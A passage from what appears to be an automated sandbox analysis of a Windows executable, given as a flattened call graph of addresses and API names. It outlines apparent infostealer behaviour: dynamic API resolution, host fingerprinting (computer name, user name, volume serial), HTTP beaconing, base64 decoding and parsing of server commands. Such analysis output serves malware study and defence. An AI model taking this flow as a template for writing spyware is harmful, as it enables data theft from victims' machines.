API calls 26767->26768 26769 402be1 26768->26769 26770 4045c0 34 API calls 26769->26770 26771 402bfa 26770->26771 26772 4045c0 34 API calls 26771->26772 26773 402c13 26772->26773 26774 4045c0 34 API calls 26773->26774 26775 402c2c 26774->26775 26776 4045c0 34 API calls 26775->26776 26777 402c45 26776->26777 26778 4045c0 34 API calls 26777->26778 26779 402c5e 26778->26779 26780 4045c0 34 API calls 26779->26780 26781 402c77 26780->26781 26782 4045c0 34 API calls 26781->26782 26783 402c90 26782->26783 26784 4045c0 34 API calls 26783->26784 26785 402ca9 26784->26785 26786 4045c0 34 API calls 26785->26786 26787 402cc2 26786->26787 26788 4045c0 34 API calls 26787->26788 26789 402cdb 26788->26789 26790 4045c0 34 API calls 26789->26790 26791 402cf4 26790->26791 26792 4045c0 34 API calls 26791->26792 26793 402d0d 26792->26793 26794 4045c0 34 API calls 26793->26794 26795 402d26 26794->26795 26796 4045c0 34 API calls 26795->26796 26797 402d3f 26796->26797 26798 4045c0 34 API calls 26797->26798 26799 402d58 26798->26799 26800 4045c0 34 API calls 26799->26800 26801 402d71 26800->26801 26802 4045c0 34 API calls 26801->26802 26803 402d8a 26802->26803 26804 4045c0 34 API calls 26803->26804 26805 402da3 26804->26805 26806 4045c0 34 API calls 26805->26806 26807 402dbc 26806->26807 26808 4045c0 34 API calls 26807->26808 26809 402dd5 26808->26809 26810 4045c0 34 API calls 26809->26810 26811 402dee 26810->26811 26812 4045c0 34 API calls 26811->26812 26813 402e07 26812->26813 26814 4045c0 34 API calls 26813->26814 26815 402e20 26814->26815 26816 4045c0 34 API calls 26815->26816 26817 402e39 26816->26817 26818 4045c0 34 API calls 26817->26818 26819 402e52 26818->26819 26820 4045c0 34 API calls 26819->26820 26821 402e6b 26820->26821 26822 4045c0 34 API calls 26821->26822 26823 402e84 26822->26823 26824 4045c0 34 API calls 26823->26824 26825 402e9d 26824->26825 26826 4045c0 34 API calls 26825->26826 26827 402eb6 26826->26827 26828 4045c0 34 API calls 26827->26828 26829 402ecf 26828->26829 26830 4045c0 34 API calls 26829->26830 26831 402ee8 26830->26831 26832 4045c0 34 API calls 26831->26832 26833 402f01 26832->26833 26834 4045c0 34 API calls 26833->26834 26835 402f1a 26834->26835 26836 4045c0 34 API calls 26835->26836 26837 402f33 26836->26837 26838 4045c0 34 API calls 26837->26838 26839 402f4c 26838->26839 26840 4045c0 34 API calls 26839->26840 26841 402f65 26840->26841 26842 4045c0 34 API calls 26841->26842 26843 402f7e 26842->26843 26844 4045c0 34 API calls 26843->26844 26845 402f97 26844->26845 26846 4045c0 34 API calls 26845->26846 26847 402fb0 26846->26847 26848 4045c0 34 API calls 26847->26848 26849 402fc9 26848->26849 26850 4045c0 34 API calls 26849->26850 26851 402fe2 26850->26851 26852 4045c0 34 API calls 26851->26852 26853 402ffb 26852->26853 26854 4045c0 34 API calls 26853->26854 26855 403014 26854->26855 26856 4045c0 34 API calls 26855->26856 26857 40302d 26856->26857 26858 4045c0 34 API calls 26857->26858 26859 403046 26858->26859 26860 4045c0 34 API calls 26859->26860 26861 40305f 26860->26861 26862 4045c0 34 API calls 26861->26862 26863 403078 26862->26863 26864 4045c0 34 API calls 26863->26864 26865 403091 26864->26865 26866 4045c0 34 API calls 26865->26866 26867 4030aa 26866->26867 26868 4045c0 34 API calls 26867->26868 26869 4030c3 26868->26869 26870 4045c0 34 API calls 26869->26870 26871 4030dc 26870->26871 26872 4045c0 34 API calls 26871->26872 26873 4030f5 26872->26873 26874 4045c0 34 API calls 26873->26874 26875 40310e 26874->26875 26876 4045c0 34 API calls 26875->26876 26877 403127 26876->26877 26878 4045c0 34 API calls 26877->26878 26879 403140 26878->26879 26880 4045c0 34 API calls 26879->26880 26881 403159 26880->26881 26882 4045c0 34 API calls 26881->26882 26883 403172 26882->26883 26884 4045c0 34 API calls 26883->26884 26885 40318b 26884->26885 26886 4045c0 34 API calls 26885->26886 26887 4031a4 26886->26887 26888 4045c0 34 API calls 26887->26888 26889 4031bd 26888->26889 26890 4045c0 34 API calls 26889->26890 26891 4031d6 26890->26891 26892 4045c0 34 API calls 26891->26892 26893 4031ef 26892->26893 26894 4045c0 34 API calls 26893->26894 26895 403208 26894->26895 26896 4045c0 34 API calls 26895->26896 26897 403221 26896->26897 26898 4045c0 34 API calls 26897->26898 26899 40323a 26898->26899 26900 4045c0 34 API calls 26899->26900 26901 403253 26900->26901 26902 4045c0 34 API calls 26901->26902 26903 40326c 26902->26903 26904 4045c0 34 API calls 26903->26904 26905 403285 26904->26905 26906 4045c0 34 API calls 26905->26906 26907 40329e 26906->26907 26908 4045c0 34 API calls 26907->26908 26909 4032b7 26908->26909 26910 4045c0 34 API calls 26909->26910 26911 4032d0 26910->26911 26912 4045c0 34 API calls 26911->26912 26913 4032e9 26912->26913 26914 4045c0 34 API calls 26913->26914 26915 403302 26914->26915 26916 4045c0 34 API calls 26915->26916 26917 40331b 26916->26917 26918 4045c0 34 API calls 26917->26918 26919 403334 26918->26919 26920 4045c0 34 API calls 26919->26920 26921 40334d 26920->26921 26922 4045c0 34 API calls 26921->26922 26923 403366 26922->26923 26924 4045c0 34 API calls 26923->26924 26925 40337f 26924->26925 26926 4045c0 34 API calls 26925->26926 26927 403398 26926->26927 26928 4045c0 34 API calls 26927->26928 26929 4033b1 26928->26929 26930 4045c0 34 API calls 26929->26930 26931 4033ca 26930->26931 26932 4045c0 34 API calls 26931->26932 26933 4033e3 26932->26933 26934 4045c0 34 API calls 26933->26934 26935 4033fc 26934->26935 26936 4045c0 34 API calls 26935->26936 26937 403415 26936->26937 26938 4045c0 34 API calls 26937->26938 26939 40342e 26938->26939 26940 4045c0 34 API calls 26939->26940 26941 403447 26940->26941 26942 4045c0 34 API calls 26941->26942 26943 403460 26942->26943 26944 4045c0 34 API calls 26943->26944 26945 403479 26944->26945 26946 4045c0 34 API calls 26945->26946 26947 403492 26946->26947 26948 4045c0 34 API calls 26947->26948 26949 4034ab 26948->26949 26950 4045c0 34 API calls 26949->26950 26951 4034c4 26950->26951 26952 4045c0 34 API calls 26951->26952 26953 4034dd 26952->26953 26954 4045c0 34 API calls 26953->26954 26955 4034f6 26954->26955 26956 4045c0 34 API calls 26955->26956 26957 40350f 26956->26957 26958 4045c0 34 API calls 26957->26958 26959 403528 26958->26959 26960 4045c0 34 API calls 26959->26960 26961 403541 26960->26961 26962 4045c0 34 API calls 26961->26962 26963 40355a 26962->26963 26964 4045c0 34 API calls 26963->26964 26965 403573 26964->26965 26966 4045c0 34 API calls 26965->26966 26967 40358c 26966->26967 26968 4045c0 34 API calls 26967->26968 26969 4035a5 26968->26969 26970 4045c0 34 API calls 26969->26970 26971 4035be 26970->26971 26972 4045c0 34 API calls 26971->26972 26973 4035d7 26972->26973 26974 4045c0 34 API calls 26973->26974 26975 4035f0 26974->26975 26976 4045c0 34 API calls 26975->26976 26977 403609 26976->26977 26978 4045c0 34 API calls 26977->26978 26979 403622 26978->26979 26980 4045c0 34 API calls 26979->26980 26981 40363b 26980->26981 26982 4045c0 34 API calls 26981->26982 26983 403654 26982->26983 26984 4045c0 34 API calls 26983->26984 26985 40366d 26984->26985 26986 4045c0 34 API calls 26985->26986 26987 403686 26986->26987 26988 4045c0 34 API calls 26987->26988 26989 40369f 26988->26989 26990 4045c0 34 API calls 26989->26990 26991 4036b8 26990->26991 26992 4045c0 34 API calls 26991->26992 26993 4036d1 26992->26993 26994 4045c0 34 API calls 26993->26994 26995 4036ea 26994->26995 26996 4045c0 34 API calls 26995->26996 26997 403703 26996->26997 26998 4045c0 34 API calls 26997->26998 26999 40371c 26998->26999 27000 4045c0 34 API calls 26999->27000 27001 403735 27000->27001 27002 4045c0 34 API calls 27001->27002 27003 40374e 27002->27003 27004 4045c0 34 API calls 27003->27004 27005 403767 27004->27005 27006 4045c0 34 API calls 27005->27006 27007 403780 27006->27007 27008 4045c0 34 API calls 27007->27008 27009 403799 27008->27009 27010 4045c0 34 API calls 27009->27010 27011 4037b2 27010->27011 27012 4045c0 34 API calls 27011->27012 27013 4037cb 27012->27013 27014 4045c0 34 API calls 27013->27014 27015 4037e4 27014->27015 27016 4045c0 34 API calls 27015->27016 27017 4037fd 27016->27017 27018 4045c0 34 API calls 27017->27018 27019 403816 27018->27019 27020 4045c0 34 API calls 27019->27020 27021 40382f 27020->27021 27022 4045c0 34 API calls 27021->27022 27023 403848 27022->27023 27024 4045c0 34 API calls 27023->27024 27025 403861 27024->27025 27026 4045c0 34 API calls 27025->27026 27027 40387a 27026->27027 27028 4045c0 34 API calls 27027->27028 27029 403893 27028->27029 27030 4045c0 34 API calls 27029->27030 27031 4038ac 27030->27031 27032 4045c0 34 API calls 27031->27032 27033 4038c5 27032->27033 27034 4045c0 34 API calls 27033->27034 27035 4038de 27034->27035 27036 4045c0 34 API calls 27035->27036 27037 4038f7 27036->27037 27038 4045c0 34 API calls 27037->27038 27039 403910 27038->27039 27040 4045c0 34 API calls 27039->27040 27041 403929 27040->27041 27042 4045c0 34 API calls 27041->27042 27043 403942 27042->27043 27044 4045c0 34 API calls 27043->27044 27045 40395b 27044->27045 27046 4045c0 34 API calls 27045->27046 27047 403974 27046->27047 27048 4045c0 34 API calls 27047->27048 27049 40398d 27048->27049 27050 4045c0 34 API calls 27049->27050 27051 4039a6 27050->27051 27052 4045c0 34 API calls 27051->27052 27053 4039bf 27052->27053 27054 4045c0 34 API calls 27053->27054 27055 4039d8 27054->27055 27056 4045c0 34 API calls 27055->27056 27057 4039f1 27056->27057 27058 4045c0 34 API calls 27057->27058 27059 403a0a 27058->27059 27060 4045c0 34 API calls 27059->27060 27061 403a23 27060->27061 27062 4045c0 34 API calls 27061->27062 27063 403a3c 27062->27063 27064 4045c0 34 API calls 27063->27064 27065 403a55 27064->27065 27066 4045c0 34 API calls 27065->27066 27067 403a6e 27066->27067 27068 4045c0 34 API calls 27067->27068 27069 403a87 27068->27069 27070 4045c0 34 API calls 27069->27070 27071 403aa0 27070->27071 27072 4045c0 34 API calls 27071->27072 27073 403ab9 27072->27073 27074 4045c0 34 API calls 27073->27074 27075 403ad2 27074->27075 27076 4045c0 34 API calls 27075->27076 27077 403aeb 27076->27077 27078 4045c0 34 API calls 27077->27078 27079 403b04 27078->27079 27080 4045c0 34 API calls 27079->27080 27081 403b1d 27080->27081 27082 4045c0 34 API calls 27081->27082 27083 403b36 27082->27083 27084 4045c0 34 API calls 27083->27084 27085 403b4f 27084->27085 27086 4045c0 34 API calls 27085->27086 27087 403b68 27086->27087 27088 4045c0 34 API calls 27087->27088 27089 403b81 27088->27089 27090 4045c0 34 API calls 27089->27090 27091 403b9a 27090->27091 27092 4045c0 34 API calls 27091->27092 27093 403bb3 27092->27093 27094 4045c0 34 API calls 27093->27094 27095 403bcc 27094->27095 27096 4045c0 34 API calls 27095->27096 27097 403be5 27096->27097 27098 4045c0 34 API calls 27097->27098 27099 403bfe 27098->27099 27100 4045c0 34 API calls 27099->27100 27101 403c17 27100->27101 27102 4045c0 34 API calls 27101->27102 27103 403c30 27102->27103 27104 4045c0 34 API calls 27103->27104 27105 403c49 27104->27105 27106 4045c0 34 API calls 27105->27106 27107 403c62 27106->27107 27108 4045c0 34 API calls 27107->27108 27109 403c7b 27108->27109 27110 4045c0 34 API calls 27109->27110 27111 403c94 27110->27111 27112 4045c0 34 API calls 27111->27112 27113 403cad 27112->27113 27114 4045c0 34 API calls 27113->27114 27115 403cc6 27114->27115 27116 4045c0 34 API calls 27115->27116 27117 403cdf 27116->27117 27118 4045c0 34 API calls 27117->27118 27119 403cf8 27118->27119 27120 4045c0 34 API calls 27119->27120 27121 403d11 27120->27121 27122 4045c0 34 API calls 27121->27122 27123 403d2a 27122->27123 27124 4045c0 34 API calls 27123->27124 27125 403d43 27124->27125 27126 4045c0 34 API calls 27125->27126 27127 403d5c 27126->27127 27128 4045c0 34 API calls 27127->27128 27129 403d75 27128->27129 27130 4045c0 34 API calls 27129->27130 27131 403d8e 27130->27131 27132 4045c0 34 API calls 27131->27132 27133 403da7 27132->27133 27134 4045c0 34 API calls 27133->27134 27135 403dc0 27134->27135 27136 4045c0 34 API calls 27135->27136 27137 403dd9 27136->27137 27138 4045c0 34 API calls 27137->27138 27139 403df2 27138->27139 27140 4045c0 34 API calls 27139->27140 27141 403e0b 27140->27141 27142 4045c0 34 API calls 27141->27142 27143 403e24 27142->27143 27144 4045c0 34 API calls 27143->27144 27145 403e3d 27144->27145 27146 4045c0 34 API calls 27145->27146 27147 403e56 27146->27147 27148 4045c0 34 API calls 27147->27148 27149 403e6f 27148->27149 27150 4045c0 34 API calls 27149->27150 27151 403e88 27150->27151 27152 4045c0 34 API calls 27151->27152 27153 403ea1 27152->27153 27154 4045c0 34 API calls 27153->27154 27155 403eba 27154->27155 27156 4045c0 34 API calls 27155->27156 27157 403ed3 27156->27157 27158 4045c0 34 API calls 27157->27158 27159 403eec 27158->27159 27160 4045c0 34 API calls 27159->27160 27161 403f05 27160->27161 27162 4045c0 34 API calls 27161->27162 27163 403f1e 27162->27163 27164 4045c0 34 API calls 27163->27164 27165 403f37 27164->27165 27166 4045c0 34 API calls 27165->27166 27167 403f50 27166->27167 27168 4045c0 34 API calls 27167->27168 27169 403f69 27168->27169 27170 4045c0 34 API calls 27169->27170 27171 403f82 27170->27171 27172 4045c0 34 API calls 27171->27172 27173 403f9b 27172->27173 27174 4045c0 34 API calls 27173->27174 27175 403fb4 27174->27175 27176 4045c0 34 API calls 27175->27176 27177 403fcd 27176->27177 27178 4045c0 34 API calls 27177->27178 27179 403fe6 27178->27179 27180 4045c0 34 API calls 27179->27180 27181 403fff 27180->27181 27182 4045c0 34 API calls 27181->27182 27183 404018 27182->27183 27184 4045c0 34 API calls 27183->27184 27185 404031 27184->27185 27186 4045c0 34 API calls 27185->27186 27187 40404a 27186->27187 27188 4045c0 34 API calls 27187->27188 27189 404063 27188->27189 27190 4045c0 34 API calls 27189->27190 27191 40407c 27190->27191 27192 4045c0 34 API calls 27191->27192 27193 404095 27192->27193 27194 4045c0 34 API calls 27193->27194 27195 4040ae 27194->27195 27196 4045c0 34 API calls 27195->27196 27197 4040c7 27196->27197 27198 4045c0 34 API calls 27197->27198 27199 4040e0 27198->27199 27200 4045c0 34 API calls 27199->27200 27201 4040f9 27200->27201 27202 4045c0 34 API calls 27201->27202 27203 404112 27202->27203 27204 4045c0 34 API calls 27203->27204 27205 40412b 27204->27205 27206 4045c0 34 API calls 27205->27206 27207 404144 27206->27207 27208 4045c0 34 API calls 27207->27208 27209 40415d 27208->27209 27210 4045c0 34 API calls 27209->27210 27211 404176 27210->27211 27212 4045c0 34 API calls 27211->27212 27213 40418f 27212->27213 27214 4045c0 34 API calls 27213->27214 27215 4041a8 27214->27215 27216 4045c0 34 API calls 27215->27216 27217 4041c1 27216->27217 27218 4045c0 34 API calls 27217->27218 27219 4041da 27218->27219 27220 4045c0 34 API calls 27219->27220 27221 4041f3 27220->27221 27222 4045c0 34 API calls 27221->27222 27223 40420c 27222->27223 27224 4045c0 34 API calls 27223->27224 27225 404225 27224->27225 27226 4045c0 34 API calls 27225->27226 27227 40423e 27226->27227 27228 4045c0 34 API calls 27227->27228 27229 404257 27228->27229 27230 4045c0 34 API calls 27229->27230 27231 404270 27230->27231 27232 4045c0 34 API calls 27231->27232 27233 404289 27232->27233 27234 4045c0 34 API calls 27233->27234 27235 4042a2 27234->27235 27236 4045c0 34 API calls 27235->27236 27237 4042bb 27236->27237 27238 4045c0 34 API calls 27237->27238 27239 4042d4 27238->27239 27240 4045c0 34 API calls 27239->27240 27241 4042ed 27240->27241 27242 4045c0 34 API calls 27241->27242 27243 404306 27242->27243 27244 4045c0 34 API calls 27243->27244 27245 40431f 27244->27245 27246 4045c0 34 API calls 27245->27246 27247 404338 27246->27247 27248 4045c0 34 API calls 27247->27248 27249 404351 27248->27249 27250 4045c0 34 API calls 27249->27250 27251 40436a 27250->27251 27252 4045c0 34 API calls 27251->27252 27253 404383 27252->27253 27254 4045c0 34 API calls 27253->27254 27255 40439c 27254->27255 27256 4045c0 34 API calls 27255->27256 27257 4043b5 27256->27257 27258 4045c0 34 API calls 27257->27258 27259 4043ce 27258->27259 27260 4045c0 34 API calls 27259->27260 27261 4043e7 27260->27261 27262 4045c0 34 API calls 27261->27262 27263 404400 27262->27263 27264 4045c0 34 API calls 27263->27264 27265 404419 27264->27265 27266 4045c0 34 API calls 27265->27266 27267 404432 27266->27267 27268 4045c0 34 API calls 27267->27268 27269 40444b 27268->27269 27270 4045c0 34 API calls 27269->27270 27271 404464 27270->27271 27272 4045c0 34 API calls 27271->27272 27273 40447d 27272->27273 27274 4045c0 34 API calls 27273->27274 27275 404496 27274->27275 27276 4045c0 34 API calls 27275->27276 27277 4044af 27276->27277 27278 4045c0 34 API calls 27277->27278 27279 4044c8 27278->27279 27280 4045c0 34 API calls 27279->27280 27281 4044e1 27280->27281 27282 4045c0 34 API calls 27281->27282 27283 4044fa 27282->27283 27284 4045c0 34 API calls 27283->27284 27285 404513 27284->27285 27286 4045c0 34 API calls 27285->27286 27287 40452c 27286->27287 27288 4045c0 34 API calls 27287->27288 27289 404545 27288->27289 27290 4045c0 34 API calls 27289->27290 27291 40455e 27290->27291 27292 4045c0 34 API calls 27291->27292 27293 404577 27292->27293 27294 4045c0 34 API calls 27293->27294 27295 404590 27294->27295 27296 4045c0 34 API calls 27295->27296 27297 4045a9 27296->27297 27298 419c10 27297->27298 27299 419c20 43 API calls 27298->27299 27300 41a036 8 API calls 27298->27300 27299->27300 27301 41a146 27300->27301 27302 41a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27300->27302 27303 41a153 8 API calls 27301->27303 27304 41a216 27301->27304 27302->27301 27303->27304 27305 41a298 27304->27305 27306 41a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27304->27306 27307 41a2a5 6 API calls 27305->27307 27308 41a337 27305->27308 27306->27305 27307->27308 27309 41a344 9 API calls 27308->27309 27310 41a41f 27308->27310 27309->27310 27311 41a4a2 27310->27311 27312 41a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27310->27312 27313 41a4ab GetProcAddress GetProcAddress 27311->27313 27314 41a4dc 27311->27314 27312->27311 27313->27314 27315 41a515 27314->27315 27316 41a4e5 GetProcAddress GetProcAddress 27314->27316 27317 41a612 27315->27317 27318 41a522 10 API calls 27315->27318 27316->27315 27319 41a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27317->27319 27320 41a67d 27317->27320 27318->27317 27319->27320 27321 41a686 GetProcAddress 27320->27321 27322 41a69e 27320->27322 27321->27322 27323 41a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 27322->27323 27324 415ca3 27322->27324 27323->27324 27325 401590 27324->27325 27600 401670 27325->27600 27328 41a7a0 lstrcpy 27329 4015b5 27328->27329 27330 41a7a0 lstrcpy 27329->27330 27331 4015c7 27330->27331 27332 41a7a0 lstrcpy 27331->27332 27333 4015d9 27332->27333 27334 41a7a0 lstrcpy 27333->27334 27335 401663 27334->27335 27336 415510 27335->27336 27337 415521 27336->27337 27338 41a820 2 API calls 27337->27338 27339 41552e 27338->27339 27340 41a820 2 API calls 27339->27340 27341 41553b 27340->27341 27342 41a820 2 API calls 27341->27342 27343 415548 27342->27343 27344 41a740 lstrcpy 27343->27344 27345 415555 27344->27345 27346 41a740 lstrcpy 27345->27346 27347 415562 27346->27347 27348 41a740 lstrcpy 27347->27348 27349 41556f 27348->27349 27350 41a740 lstrcpy 27349->27350 27390 41557c 27350->27390 27351 4152c0 29 API calls 27351->27390 27352 4151f0 23 API calls 27352->27390 27353 415643 StrCmpCA 27353->27390 27354 4156a0 StrCmpCA 27355 4157dc 27354->27355 27354->27390 27356 41a8a0 lstrcpy 27355->27356 27357 4157e8 27356->27357 27358 41a820 2 API calls 27357->27358 27361 4157f6 27358->27361 27359 41a740 lstrcpy 27359->27390 27360 41a820 lstrlenA lstrcpy 27360->27390 27363 41a820 2 API calls 27361->27363 27362 415856 StrCmpCA 27364 415991 27362->27364 27362->27390 27367 415805 27363->27367 27366 41a8a0 lstrcpy 27364->27366 27365 41a8a0 lstrcpy 27365->27390 27368 41599d 27366->27368 27369 401670 lstrcpy 27367->27369 27370 41a820 2 API calls 27368->27370 27387 415811 27369->27387 27371 4159ab 27370->27371 27373 41a820 2 API calls 27371->27373 27372 415a0b StrCmpCA 27374 415a16 Sleep 27372->27374 27375 415a28 27372->27375 27376 4159ba 27373->27376 27374->27390 27377 41a8a0 lstrcpy 27375->27377 27380 401670 lstrcpy 27376->27380 27378 415a34 27377->27378 27381 41a820 2 API calls 27378->27381 27379 401590 lstrcpy 27379->27390 27380->27387 27382 415a43 27381->27382 27383 41a820 2 API calls 27382->27383 27384 415a52 27383->27384 27386 401670 lstrcpy 27384->27386 27385 41578a StrCmpCA 27385->27390 27386->27387 27387->26444 27388 41593f StrCmpCA 27388->27390 27389 41a7a0 lstrcpy 27389->27390 27390->27351 27390->27352 27390->27353 27390->27354 27390->27359 27390->27360 27390->27362 27390->27365 27390->27372 27390->27379 27390->27385 27390->27388 27390->27389 27392 417553 GetVolumeInformationA 27391->27392 27393 41754c 27391->27393 27394 417591 27392->27394 27393->27392 27395 4175fc GetProcessHeap HeapAlloc 27394->27395 27396 417619 27395->27396 27397 417628 wsprintfA 27395->27397 27398 41a740 lstrcpy 27396->27398 27399 41a740 lstrcpy 27397->27399 27400 415da7 27398->27400 27399->27400 27400->26465 27402 41a7a0 lstrcpy 27401->27402 27403 404899 27402->27403 27609 4047b0 27403->27609 27405 4048a5 27406 41a740 lstrcpy 27405->27406 27407 4048d7 27406->27407 27408 41a740 lstrcpy 27407->27408 27409 4048e4 27408->27409 27410 41a740 lstrcpy 27409->27410 27411 4048f1 27410->27411 27412 41a740 lstrcpy 27411->27412 27413 4048fe 27412->27413 27414 41a740 lstrcpy 27413->27414 27415 40490b InternetOpenA StrCmpCA 27414->27415 27416 404944 27415->27416 27417 404955 27416->27417 27418 404ecb InternetCloseHandle 27416->27418 27622 418b60 GetSystemTime lstrcpy lstrcpy 27417->27622 27420 404ee8 27418->27420 27617 409ac0 CryptStringToBinaryA 27420->27617 27421 404963 27623 41a920 lstrcpy lstrcpy lstrcatA 27421->27623 27424 404976 27426 41a8a0 lstrcpy 27424->27426 27431 40497f 27426->27431 27427 41a820 2 API calls 27428 404f05 27427->27428 27429 41a9b0 4 API calls 27428->27429 27432 404f1b 27429->27432 27430 404f27 ctype 27434 41a7a0 lstrcpy 27430->27434 27435 41a9b0 4 API calls 27431->27435 27433 41a8a0 lstrcpy 27432->27433 27433->27430 27447 404f57 27434->27447 27436 4049a9 27435->27436 27437 41a8a0 lstrcpy 27436->27437 27438 4049b2 27437->27438 27439 41a9b0 4 API calls 27438->27439 27440 4049d1 27439->27440 27441 41a8a0 lstrcpy 27440->27441 27442 4049da 27441->27442 27624 41a920 lstrcpy lstrcpy lstrcatA 27442->27624 27444 4049f8 27445 41a8a0 lstrcpy 27444->27445 27446 404a01 27445->27446 27448 41a9b0 4 API calls 27446->27448 27447->26468 27449 404a20 27448->27449 27450 41a8a0 lstrcpy 27449->27450 27451 404a29 27450->27451 27452 41a9b0 4 API calls 27451->27452 27453 404a48 27452->27453 27454 41a8a0 lstrcpy 27453->27454 27455 404a51 27454->27455 27456 41a9b0 4 API calls 27455->27456 27457 404a7d 27456->27457 27625 41a920 lstrcpy lstrcpy lstrcatA 27457->27625 27459 404a84 27460 41a8a0 lstrcpy 27459->27460 27461 404a8d 27460->27461 27462 404aa3 InternetConnectA 27461->27462 27462->27418 27463 404ad3 HttpOpenRequestA 27462->27463 27465 404b28 27463->27465 27466 404ebe InternetCloseHandle 27463->27466 27467 41a9b0 4 API calls 27465->27467 27466->27418 27468 404b3c 27467->27468 27469 41a8a0 lstrcpy 27468->27469 27470 404b45 27469->27470 27626 41a920 lstrcpy lstrcpy lstrcatA 27470->27626 27472 404b63 27473 41a8a0 lstrcpy 27472->27473 27474 404b6c 27473->27474 27475 41a9b0 4 API calls 27474->27475 27476 404b8b 27475->27476 27477 41a8a0 lstrcpy 27476->27477 27478 404b94 27477->27478 27479 41a9b0 4 API calls 27478->27479 27480 404bb5 27479->27480 27481 41a8a0 lstrcpy 27480->27481 27482 404bbe 27481->27482 27483 41a9b0 4 API calls 27482->27483 27484 404bde 27483->27484 27485 41a8a0 lstrcpy 27484->27485 27486 404be7 27485->27486 27487 41a9b0 4 API calls 27486->27487 27488 404c06 27487->27488 27489 41a8a0 lstrcpy 27488->27489 27490 404c0f 27489->27490 27627 41a920 lstrcpy lstrcpy lstrcatA 27490->27627 27492 404c2d 27493 41a8a0 lstrcpy 27492->27493 27494 404c36 27493->27494 27495 41a9b0 4 API calls 27494->27495 27496 404c55 27495->27496 27497 41a8a0 lstrcpy 27496->27497 27498 404c5e 27497->27498 27499 41a9b0 4 API calls 27498->27499 27500 404c7d 27499->27500 27501 41a8a0 lstrcpy 27500->27501 27502 404c86 27501->27502 27628 41a920 lstrcpy lstrcpy lstrcatA 27502->27628 27504 404ca4 27505 41a8a0 lstrcpy 27504->27505 27506 404cad 27505->27506 27507 41a9b0 4 API calls 27506->27507 27508 404ccc 27507->27508 27509 41a8a0 lstrcpy 27508->27509 27510 404cd5 27509->27510 27511 41a9b0 4 API calls 27510->27511 27512 404cf6 27511->27512 27513 41a8a0 lstrcpy 27512->27513 27514 404cff 27513->27514 27515 41a9b0 4 API calls 27514->27515 27516 404d1f 27515->27516 27517 41a8a0 lstrcpy 27516->27517 27518 404d28 27517->27518 27519 41a9b0 4 API calls 27518->27519 27520 404d47 27519->27520 27521 41a8a0 lstrcpy 27520->27521 27522 404d50 27521->27522 27629 41a920 lstrcpy lstrcpy lstrcatA 27522->27629 27524 404d6e 27525 41a8a0 lstrcpy 27524->27525 27526 404d77 27525->27526 27527 41a740 lstrcpy 27526->27527 27528 404d92 27527->27528 27630 41a920 lstrcpy lstrcpy lstrcatA 27528->27630 27530 404db3 27631 41a920 lstrcpy lstrcpy lstrcatA 27530->27631 27532 404dba 27533 41a8a0 lstrcpy 27532->27533 27534 404dc6 27533->27534 27535 404de7 lstrlenA 27534->27535 27536 404dfa 27535->27536 27537 404e03 lstrlenA 27536->27537 27632 41aad0 27537->27632 27539 404e13 HttpSendRequestA 27540 404e32 InternetReadFile 27539->27540 27541 404e67 InternetCloseHandle 27540->27541 27546 404e5e 27540->27546 27544 41a800 27541->27544 27543 41a9b0 4 API calls 27543->27546 27544->27466 27545 41a8a0 lstrcpy 27545->27546 27546->27540 27546->27541 27546->27543 27546->27545 27637 41aad0 27547->27637 27549 4117c4 StrCmpCA 27550 4117d7 27549->27550 27551 4117cf ExitProcess 27549->27551 27552 4117e7 strtok_s 27550->27552 27555 4117f4 27552->27555 27553 4119c2 27553->26470 27554 41199e strtok_s 27554->27555 27555->27553 27555->27554 27556 4118ad StrCmpCA 27555->27556 27557 4118cf StrCmpCA 27555->27557 27558 4118f1 StrCmpCA 27555->27558 27559 411951 StrCmpCA 27555->27559 27560 411970 StrCmpCA 27555->27560 27561 411913 StrCmpCA 27555->27561 27562 411932 StrCmpCA 27555->27562 27563 41185d StrCmpCA 27555->27563 27564 41187f StrCmpCA 27555->27564 27565 41a820 lstrlenA lstrcpy 27555->27565 27566 41a820 2 API calls 27555->27566 27556->27555 27557->27555 27558->27555 27559->27555 27560->27555 27561->27555 27562->27555 27563->27555 27564->27555 27565->27555 27566->27554 27567->26476 27568->26478 27569->26484 27570->26486 27571->26492 27572->26494 27573->26498 27574->26502 27575->26506 27576->26512 27577->26514 27578->26518 27579->26532 27580->26536 27581->26535 27582->26531 27583->26535 27584->26552 27585->26569 27586->26555 27587->26546 27588->26547 27589->26549 27590->26556 27591->26559 27592->26566 27593->26589 27594->26593 27595->26592 27596->26588 27597->26592 27598->26602 27601 41a7a0 lstrcpy 27600->27601 27602 401683 27601->27602 27603 41a7a0 lstrcpy 27602->27603 27604 401695 27603->27604 27605 41a7a0 lstrcpy 27604->27605 27606 4016a7 27605->27606 27607 41a7a0 lstrcpy 27606->27607 27608 4015a3 27607->27608 27608->27328 27633 401030 27609->27633 27613 404838 lstrlenA 27636 41aad0 27613->27636 27615 404848 InternetCrackUrlA 27616 404867 27615->27616 27616->27405 27618 409af9 LocalAlloc 27617->27618 27619 404eee 27617->27619 27618->27619 27620 409b14 CryptStringToBinaryA 27618->27620 27619->27427 27619->27430 27620->27619 27621 409b39 LocalFree 27620->27621 27621->27619 27622->27421 27623->27424 27624->27444 27625->27459 27626->27472 27627->27492 27628->27504 27629->27524 27630->27530 27631->27532 27632->27539 27634 40103a ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 27633->27634 27635 41aad0 27634->27635 27635->27613 27636->27615 27637->27549 27763 416ab1 902 API calls 27732 4069f3 7 API calls 27705 22d0297 131 API calls 27706 22dae93 43 API calls ctype 27765 41cafe 219 API calls 5 library calls 27766 22dcce9 162 API calls ___crtGetStringTypeA 27801 22d35e4 9 API calls 27802 22d19e7 StrCmpCA ExitProcess strtok_s strtok_s 26209 401190 26216 4178e0 GetProcessHeap HeapAlloc GetComputerNameA 26209->26216 26211 40119e 26212 4011cc 26211->26212 26218 417850 GetProcessHeap HeapAlloc GetUserNameA 26211->26218 26214 4011b7 26214->26212 26215 4011c4 ExitProcess 26214->26215 26217 417939 26216->26217 26217->26211 26219 4178c3 26218->26219 26219->26214 27768 22d30f9 7 API calls 27769 22cf8f1 32 API calls 27770 41ce9f 69 API calls __amsg_exit 27709 4088a4 RaiseException task __CxxThrowException@8 27710 4180a5 GetProcessHeap HeapFree 27734 22d13c7 strtok_s strtok_s 27736 41b9b0 RtlUnwind 27775 